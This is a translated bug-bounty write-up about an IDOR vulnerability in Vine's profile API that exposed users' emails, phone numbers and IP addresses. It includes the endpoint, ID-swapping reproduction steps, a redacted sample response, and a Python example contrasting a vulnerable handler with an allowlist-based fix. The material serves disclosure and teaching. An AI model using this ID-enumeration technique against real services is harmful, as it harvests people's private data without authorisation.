Bug-hunting notes | Vine user private information disclosure vulnerability ($7,560)
Hello everyone. Today I want to share a user privacy disclosure vulnerability in Vine, the free mobile app owned by Twitter. The bug was found by Bangladeshi security researcher Prial Islam and is an insecure direct object reference (IDOR): an attacker could use it to obtain the IP address, phone number, registration email and other personal data of any Vine user. Twitter ultimately paid a $7,560 bounty for it.
Vulnerability description
Vulnerable endpoint:
https://vine.co/api/users/profiles/<User Id>
While I was testing Vine's subdomains, I happened to notice that the response from the endpoint above contained all of the personal information tied to my own account. I thought about it and figured this was probably because I was logged in, which seemed normal enough.
Next I checked the cross-origin resource sharing (CORS) configuration for any misconfiguration, but found nothing abnormal there either.
Then I tried changing the User-ID value to another random number, and that was it: the response now contained all of another user's information. In other words, by swapping in any other user's User-ID, I could retrieve the complete registration details of any Vine user. I was stunned.
Reproduction
1. First, you need the User-ID of your target user. Ways to collect it include browsing their Vine profile page, exchanging messages with them, and so on; I will not go into detail here.
2. Put the target's User-ID into the link https://vine.co/api/users/profiles/<User Id>, replacing the <User Id> part, and request it. The response body will contain all of the target's personal registration data. The response looks like this:
{
  "code": "",
  "data": {
    "followerCount": 16271364,
    "includePromoted": 1,
    "captchaSucceeded": 0,
    "recordComment": null,
    "locale": "iUS",
    "shareUrl": "https://vine.co/████████",
    "hiddenPhoneNumber": 0,
    "notPorn": 0,
    "userId": █████████,
    "private": 0,
    "likeCount": null,
    "commentCount": null,
    "platforms": ["android", "ios"],
    "postCount": null,
    "profileBackground": "0x33ccbf",
    "suspended": null,
    "hiddenFacebook": 0,
    "verifiedEmail": 0,
    "explicitContent": 0,
    "dmcaStrikeCount": 0,
    "flaggedCount": 7579,
    "verified": 1,
    "loopCount": 6132344784,
    "avatarUrl": "http://v.cdn.vine.co/r/avatars/████████████████████████████████████████.jpg?versionId=JIjnvXTkbWpjvk7glYZIXDqt187couHr",
    "authoredPostCount": 598,
    "review_result_illegal_review": 0,
    "review_result_ok": 0,
    "review": null,
    "suspendedBy": null,
    "twitterId": ████████,
    "phoneNumber": "██████████",
    "location": "Los Angeles California",
    "notifyActivity": 1,
    "facebookConnected": 1,
    "explicitContentAdmin": 0,
    "statsTags": null,
    "hiddenEmail": 0,
    "unflaggable": 0,
    "username": "████████",
    "modified": "2017-01-29T01:24:00.000000",
    "userIdStr": "████████",
    "twitterIdStr": "████████",
    "vanityUrls": ["kingbach"],
    "remixDisabled": 0,
    "deleted": null,
    "categories": null,
    "released": 0,
    "loopVelocity": null,
    "strikeCounts": [
      {"count": 0, "strikeType": "SEVERE_POLICY_VIOLATION"},
      {"count": 0, "strikeType": "DMCA"},
      {"count": 0, "strikeType": "SENSITIVE"},
      {"count": 0, "strikeType": "POSSIBLY_ILLEGAL"},
      {"count": 0, "strikeType": "GRAPHIC_NON_VIOLATING"},
      {"count": 0, "strikeType": "ESC"}
    ],
    "uploadHD": 1,
    "verifiedPhoneNumber": 1,
    "hiddenTwitter": 0,
    "vineVerified": 1,
    "notifyMessages": 1,
    "needsPhoneVerification": 0,
    "repostCount": null,
    "twitterScreenname": "██████",
    "secondaryColor": "0x33ccbf",
    "twitterVerified": 1,
    "captchaRequired": 0,
    "edition": null,
    "acceptsOutOfNetworkConversations": 1,
    "disableAddressBook": 1,
    "description": "Instagram/Twitter/Shots/SnapChat- @███ For booking go to the library",
    "escStrikeCount": 0,
    "review_result_explicit": 0,
    "notificationsLastViewed": "2016-04-26T21:03:35.000000",
    "email": "████████",
    "hideFromPopular": 0,
    "admin": 0,
    "contentReview": 0,
    "created": "2013-04-13T19:30:31.000000",
    "review_result_illegal_confirmed": 0,
    "followingCount": null,
    "lastLogin": "2016-12-13T23:29:40.000000",
    "escUser": 0,
    "ipAddress": "██████",
    "twitterConnected": 1
  },
  "success": true,
  "error": ""
}
Look closely at the response above and you will see that it contains a large amount of personal registration data (redacted here), for example:
"platforms": ["android", "ios"]
"flaggedCount": 7579
"twitterId": █████████
"phoneNumber": "█████"
"location": "Los Angeles California"
"modified": "2017-01-29T01:24:00.000000"
"notificationsLastViewed": "2016-04-26T21:03:35.000000"
"email": "█████████"
"created": "2013-04-13T19:30:31.000000"
"lastLogin": "2016-12-13T23:29:40.000000"
"ipAddress": "█████"
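The bug pattern is worth seeing side by side with its fix. The block below is an added illustration written for this article, not Vine's code: it models the profile endpoint against an in-memory store with constructed sample users, first as the report describes it (any logged-in caller gets the raw record for any User-ID) and then with the check a hardened handler needs (owner-only fields are projected out unless the requester *is* the target). Note that the real response above carries flags such as "hiddenEmail", "hiddenPhoneNumber" and "private"; whatever those were meant to control, the server still returned the full record, which is exactly why filtering must happen server-side on an allowlist. The `leaked_fields` helper is the check a tester runs: request a different user's profile and list which owner-only fields came back. Function and field names are this example's own.

```python
"""Vulnerable vs. hardened profile lookup (added example, not Vine's code)."""
from copy import deepcopy

# Constructed sample records, loosely shaped after the leaked response.
USERS = {
    1001: {
        "userId": 1001, "username": "alice", "location": "Los Angeles California",
        "followerCount": 16271364, "verified": 1, "platforms": ["android", "ios"],
        "email": "alice@example.invalid", "phoneNumber": "+15555550100",
        "ipAddress": "203.0.113.7", "lastLogin": "2016-12-13T23:29:40.000000",
        "twitterId": 4242, "notificationsLastViewed": "2016-04-26T21:03:35.000000",
        "flaggedCount": 7579, "hiddenEmail": 0, "private": 0,
    },
    1002: {
        "userId": 1002, "username": "bob", "location": "Dhaka",
        "followerCount": 12, "verified": 0, "platforms": ["android"],
        "email": "bob@example.invalid", "phoneNumber": "+15555550101",
        "ipAddress": "198.51.100.9", "lastLogin": "2017-01-02T10:00:00.000000",
        "twitterId": 4343, "notificationsLastViewed": "2017-01-01T09:00:00.000000",
        "flaggedCount": 0, "hiddenEmail": 1, "private": 0,
    },
}

# Allowlist of fields anyone may see. Everything not listed is owner-only, so a
# column added tomorrow stays private by default (a denylist would leak it).
PUBLIC_FIELDS = {"userId", "username", "location", "followerCount",
                 "verified", "platforms"}

# Owner-only fields the report called out; used by the IDOR check below.
SENSITIVE_FIELDS = {"email", "phoneNumber", "ipAddress", "twitterId",
                    "lastLogin", "notificationsLastViewed", "flaggedCount"}


class NotFound(Exception):
    pass


class Forbidden(Exception):
    pass


def get_profile_vulnerable(requester_id, target_id):
    """Models the bug: 'is the caller logged in?' is the only check, and the
    requested object is never tied to the caller's identity."""
    if requester_id not in USERS:
        raise Forbidden("login required")
    if target_id not in USERS:
        raise NotFound(target_id)
    return deepcopy(USERS[target_id])          # raw record, every field


def get_profile_fixed(requester_id, target_id):
    """Hardened: the owner gets the full record; anyone else gets only the
    allowlisted projection, decided on the server, regardless of client flags."""
    if requester_id not in USERS:
        raise Forbidden("login required")
    record = USERS.get(target_id)
    if record is None:
        raise NotFound(target_id)
    if requester_id == target_id:
        return deepcopy(record)
    return {k: deepcopy(v) for k, v in record.items() if k in PUBLIC_FIELDS}


def leaked_fields(handler, requester_id, target_id):
    """IDOR check in the spirit of the report: fetch *another* user's profile
    and return the owner-only fields that came back. Empty set means pass."""
    try:
        body = handler(requester_id, target_id)
    except (Forbidden, NotFound):
        return set()
    return SENSITIVE_FIELDS & set(body)


if __name__ == "__main__":
    # Same request (bob asks for alice) against both handlers.
    print("vulnerable leaks:", sorted(leaked_fields(get_profile_vulnerable, 1002, 1001)))
    print("fixed leaks:     ", sorted(leaked_fields(get_profile_fixed, 1002, 1001)))
```

Run it and the vulnerable handler reports every sensitive field while the fixed one reports none; alice requesting her own profile still sees her email. The allowlist is the important design choice: copying the record and deleting the fields you remember as sensitive is how "lastLogin" and "ipAddress" end up in a profile API in the first place.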
Impact
With a user's IP address, email address and phone number an attacker has plenty to work with, and the bug also allows mass collection of Vine users' personal data, putting their privacy and security at risk. It also affects the Twitter accounts linked to Vine users, because Vine lets users sign in with their Twitter account.
For more details, see the original report: https://hackerone.com/reports/202823
*Source: medium; translated by clouds. Please credit FreeBuf.COM when reposting.